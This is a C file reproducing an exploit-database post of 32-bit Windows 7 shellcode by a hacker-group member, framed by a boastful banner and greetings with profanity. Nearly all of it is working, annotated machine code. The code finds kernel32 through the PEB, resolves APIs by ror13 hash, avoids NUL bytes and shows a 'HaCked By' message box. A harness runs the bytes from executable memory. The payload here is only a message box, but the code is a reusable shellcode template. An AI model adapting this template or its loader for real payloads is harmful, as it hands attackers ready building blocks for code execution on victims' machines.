/* 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KedAns-Dz member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ### # Title : Windows7 Sub_Xor MessageBox Exec Shellcode - (265 + Msg.&.Title) Bytes # Author : KedAns-Dz # E-mail : ked-h (@hotmail.com / @1337day.com) # Home : Hassi.Messaoud (30500) - Algeria -(00213555248701) # Web Site : www.1337day.com # FaCeb0ok : http://fb.me/Inj3ct0rK3d # TwiTter : @kedans # Friendly Sites : www.r00tw0rm.com * www.exploit-id.com # Platform/CatID : Shellcode - Local - Win32 # Type : Shellcode - proof of concept - Windows # Tested on : Windows7 ### # <3 <3 Greetings t0 Palestine <3 <3 # F-ck HaCking, Lov3 Explo8ting ! 
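/* proof / test img : http://oi47.tinypic.com/2cs6g3n.jpg */
#include <stdio.h>
#include <string.h>
#ifdef _WIN32
#include <windows.h>
#endif

/* The payload below reads fs:[0x30] and uses 32-bit PEB/PE offsets: it only
 * runs inside a 32-bit process.  Fail the build instead of crashing at run time. */
#ifdef _WIN64
#error "32-bit x86 payload: build this harness as a 32-bit (x86) binary"
#endif

/*
 * Windows7 Sub_Xor MessageBox Exec Shellcode - (265 + Msg.&.Title) Bytes
 *
 * 32-bit x86 Windows shellcode, 275 bytes, no NUL bytes (verified by main()).
 *
 * Layout (offsets into msg[]):
 *   0x00-0x28  GetPC via fnstenv, then walk PEB->Ldr->InInitializationOrder-
 *              ModuleList for the first module whose BaseDllName is exactly
 *              12 wide chars ("kernel32.dll"), and jump to the payload.
 *   0x29-0x76  find_function(base, hash): ror-13/add hash of every export
 *              name, result in eax.  Called as push hash; push base; call.
 *              The two arguments are left on the stack for the caller.
 *   0x77-      payload: LoadLibraryA("user32.dll"), resolve MessageBoxA and
 *              ExitProcess, MessageBoxA(NULL, text, title, MB_OK), ExitProcess(0).
 *
 * Hash constants are the usual ror13 values: 0xEC0E4E8E = LoadLibraryA,
 * 0x73E2D87E = ExitProcess, 0xBC4DA2A8 = MessageBoxA.  Strings are built with
 * PUSH imm32 and NUL-terminated by storing a byte from a register that is
 * known to be zero, which is how the payload avoids embedded NUL bytes.
 *
 * NOTE(review): the kernel32 lookup is a heuristic (12-char name); it assumes
 * no earlier entry in the list has a 12-char name, as on Windows 7.  If a
 * hash is not found, find_function returns with eax unchanged (popad), so the
 * payload would then call through a stale pointer.
 */
char msg[] =
    /* ---- GetPC: fnstenv writes the FPU instruction pointer (address of
     *      the fldpi, i.e. offset 0) to [esp]; it is popped into ecx below. */
    "\xD9\xEB"              /* fldpi                                        */
    "\x9B"                  /* fwait                                        */
    "\xD9\x74\x24\xF4"      /* fnstenv [esp-0xC]                            */
    /* ---- find kernel32.dll base in eax                                    */
    "\x31\xD2"              /* xor edx, edx                                 */
    "\xB2\x77"              /* mov dl, 0x77          ; payload offset       */
    "\x31\xC9"              /* xor ecx, ecx                                 */
    "\x64\x8B\x71\x30"      /* mov esi, fs:[ecx+0x30] ; PEB                 */
    "\x8B\x76\x0C"          /* mov esi, [esi+0x0C]   ; PEB->Ldr             */
    "\x8B\x76\x1C"          /* mov esi, [esi+0x1C]   ; InInitOrder list     */
    "\x8B\x46\x08"          /* next: mov eax, [esi+0x08] ; DllBase          */
    "\x8B\x7E\x20"          /* mov edi, [esi+0x20]   ; BaseDllName.Buffer   */
    "\x8B\x36"              /* mov esi, [esi]        ; Flink                */
    "\x38\x4F\x18"          /* cmp [edi+0x18], cl    ; 13th wchar == 0 ?    */
    "\x75\xF3"              /* jnz next                                     */
    "\x59"                  /* pop ecx               ; address of fldpi     */
    "\x01\xD1"              /* add ecx, edx                                 */
    "\xFF\xE1"              /* jmp ecx               ; -> payload (0x77)    */
    /* ---- find_function: [esp+4]=module base, [esp+8]=ror13 hash          */
    "\x60"                  /* pushad                                       */
    "\x8B\x6C\x24\x24"      /* mov ebp, [esp+0x24]   ; base                 */
    "\x8B\x45\x3C"          /* mov eax, [ebp+0x3C]   ; e_lfanew             */
    "\x8B\x54\x28\x78"      /* mov edx, [eax+ebp+0x78] ; export dir RVA     */
    "\x01\xEA"              /* add edx, ebp                                 */
    "\x8B\x4A\x18"          /* mov ecx, [edx+0x18]   ; NumberOfNames        */
    "\x8B\x5A\x20"          /* mov ebx, [edx+0x20]   ; AddressOfNames       */
    "\x01\xEB"              /* add ebx, ebp                                 */
    "\xE3\x34"              /* names: jecxz done     ; none left -> popad   */
    "\x49"                  /* dec ecx                                      */
    "\x8B\x34\x8B"          /* mov esi, [ebx+ecx*4]  ; name RVA             */
    "\x01\xEE"              /* add esi, ebp                                 */
    "\x31\xFF"              /* xor edi, edi          ; hash = 0             */
    "\x31\xC0"              /* xor eax, eax                                 */
    "\xFC"                  /* cld                                          */
    "\xAC"                  /* hash: lodsb                                  */
    "\x84\xC0"              /* test al, al                                  */
    "\x74\x07"              /* jz compare                                   */
    "\xC1\xCF\x0D"          /* ror edi, 13                                  */
    "\x01\xC7"              /* add edi, eax                                 */
    "\xEB\xF4"              /* jmp hash                                     */
    "\x3B\x7C\x24\x28"      /* compare: cmp edi, [esp+0x28] ; wanted hash   */
    "\x75\xE1"              /* jnz names                                    */
    "\x8B\x5A\x24"          /* mov ebx, [edx+0x24]   ; AddressOfNameOrdinals*/
    "\x01\xEB"              /* add ebx, ebp                                 */
    "\x66\x8B\x0C\x4B"      /* mov cx, [ebx+ecx*2]   ; ordinal              */
    "\x8B\x5A\x1C"          /* mov ebx, [edx+0x1C]   ; AddressOfFunctions   */
    "\x01\xEB"              /* add ebx, ebp                                 */
    "\x8B\x04\x8B"          /* mov eax, [ebx+ecx*4]  ; function RVA         */
    "\x01\xE8"              /* add eax, ebp                                 */
    "\x89\x44\x24\x1C"      /* mov [esp+0x1C], eax   ; pushad's eax slot    */
    "\x61"                  /* done: popad                                  */
    "\xC3"                  /* ret                                          */
    /* Free GAZzA! */
    /* ---- payload (offset 0x77), eax = kernel32 base                      */
    "\xB2\x08"              /* mov dl, 8                                    */
    "\x29\xD4"              /* sub esp, edx          ; 8-byte frame         */
    "\x89\xE5"              /* mov ebp, esp                                 */
    "\x89\xC2"              /* mov edx, eax          ; kernel32 base        */
    "\x68\x8E\x4E\x0E\xEC"  /* push 0xEC0E4E8E       ; hash(LoadLibraryA)   */
    "\x52"                  /* push edx                                     */
    "\xE8\x9F\xFF\xFF\xFF"  /* call find_function                           */
    "\x89\x45\x04"          /* mov [ebp+4], eax      ; LoadLibraryA         */
    "\xBB\x7E\xD8\xE2\x73"  /* mov ebx, 0x73E2D87E   ; hash(ExitProcess)    */
    "\x87\x1C\x24"          /* xchg [esp], ebx       ; ebx = kernel32 base  */
    "\x52"                  /* push edx                                     */
    "\xE8\x8E\xFF\xFF\xFF"  /* call find_function                           */
    "\x89\x45\x08"          /* mov [ebp+8], eax      ; ExitProcess          */
    /* "user32.dll" on the stack: "user" "32.d" "ll A", byte 10 zeroed      */
    "\x68\x6C\x6C\x20\x41"  /* push 'll A'                                  */
    "\x68\x33\x32\x2E\x64"  /* push '32.d'                                  */
    "\x68\x75\x73\x65\x72"  /* push 'user'                                  */
    "\x88\x5C\x24\x0A"      /* mov [esp+0xA], bl     ; bl = low byte of a   */
                            /*   64K-aligned module base = 0 -> terminator  */
    "\x89\xE6"              /* mov esi, esp                                 */
    "\x56"                  /* push esi                                     */
    "\xFF\x55\x04"          /* call [ebp+4]          ; LoadLibraryA         */
    "\x89\xC2"              /* mov edx, eax          ; user32 base          */
    "\x50"                  /* push eax                                     */
    "\xBB\xA8\xA2\x4D\xBC"  /* mov ebx, 0xBC4DA2A8   ; hash(MessageBoxA)    */
    "\x87\x1C\x24"          /* xchg [esp], ebx                              */
    "\x52"                  /* push edx                                     */
    "\xE8\x61\xFF\xFF\xFF"  /* call find_function    ; eax = MessageBoxA    */
    /* Message Title: 4 dwords = 16 chars, byte 15 zeroed -> "Fuck You! R.I.P" */
    "\x68\x49\x2E\x50\x58"  /* push 'I.PX'                                  */
    "\x68\x21\x20\x52\x2E"  /* push '! R.'                                  */
    "\x68\x20\x59\x6F\x75"  /* push ' You'                                  */
    "\x68\x46\x75\x63\x6B"  /* push 'Fuck'                                  */
    "\x31\xDB"              /* xor ebx, ebx                                 */
    "\x88\x5C\x24\x0F"      /* mov [esp+0xF], bl     ; terminator           */
    "\x89\xE3"              /* mov ebx, esp          ; lpCaption            */
    /* Message Content: 5 dwords = 20 chars, byte 19 zeroed -> "HaCked By KedAns-Dz" */
    "\x68\x2D\x44\x7A\x58"  /* push '-DzX'                                  */
    "\x68\x64\x41\x6E\x73"  /* push 'dAns'                                  */
    "\x68\x79\x20\x4B\x65"  /* push 'y Ke'                                  */
    "\x68\x65\x64\x20\x42"  /* push 'ed B'                                  */
    "\x68\x48\x61\x43\x6B"  /* push 'HaCk'                                  */
    "\x31\xC9"              /* xor ecx, ecx                                 */
    "\x88\x4C\x24\x13"      /* mov [esp+0x13], cl    ; terminator (one insn)*/
    "\x89\xE1"              /* mov ecx, esp          ; lpText               */
    "\x31\xD2"              /* xor edx, edx                                 */
    "\x52"                  /* push edx              ; uType = MB_OK        */
    "\x53"                  /* push ebx              ; lpCaption            */
    "\x51"                  /* push ecx              ; lpText               */
    "\x52"                  /* push edx              ; hWnd = NULL          */
    "\xFF\xD0"              /* call eax              ; MessageBoxA          */
    "\x31\xC0"              /* xor eax, eax                                 */
    "\x50"                  /* push eax              ; uExitCode = 0        */
    "\xFF\x55\x08";         /* call [ebp+8]          ; ExitProcess(0)       */

/* Execute `len` bytes of `code` in-process.
 *
 * A char[] in .data is not executable once DEP/NX is enforced for the
 * process (/NXCOMPAT image, or an opt-out / always-on system policy), so the
 * classic cast-and-call of msg[] only works when DEP is off for the binary.
 * On Windows the payload is therefore copied into a fresh RWX allocation.
 * Returns 1 on failure; on success the payload's ExitProcess never returns. */
static int run_payload(const void *code, size_t len)
{
#ifdef _WIN32
    void *exec = VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (exec == NULL) {
        fprintf(stderr, "VirtualAlloc failed: %lu\n", (unsigned long)GetLastError());
        return 1;
    }
    memcpy(exec, code, len);
    ((void (*)(void))exec)();
    return 0;
#else
    /* The payload walks the Win32 PEB; on any other OS it would just fault. */
    (void)code;
    (void)len;
    fprintf(stderr, "this payload targets 32-bit Windows; refusing to execute\n");
    return 1;
#endif
}

/* Print the payload size, check it is NUL-free, and run it. */
int main(void)
{
    size_t len = strlen(msg);

    /* An embedded NUL would silently truncate the payload whenever it is
     * delivered through a string-copy API; report it instead of running a
     * truncated blob. */
    if (len != sizeof msg - 1) {
        fprintf(stderr, "embedded NUL at offset %zu (payload is %zu bytes)\n",
                len, sizeof msg - 1);
        return 1;
    }
    printf("bytes: %zu\n", len);
    /* The payload ends in ExitProcess, which skips the CRT's exit-time
     * flush, so flush explicitly or the line is lost when stdout is a pipe. */
    fflush(stdout);

    return run_payload(msg, len);
}

/* #================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Indoushka , Caddy-Dz , Kalashinkov3 , Mennouchi.Islem
# Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Chevr0sky, Black-ID, Barbaros-DZ,
# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)
# Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all
# Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD
# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * B.N.T * All Security and Exploits Webs
#============================================================================================================*/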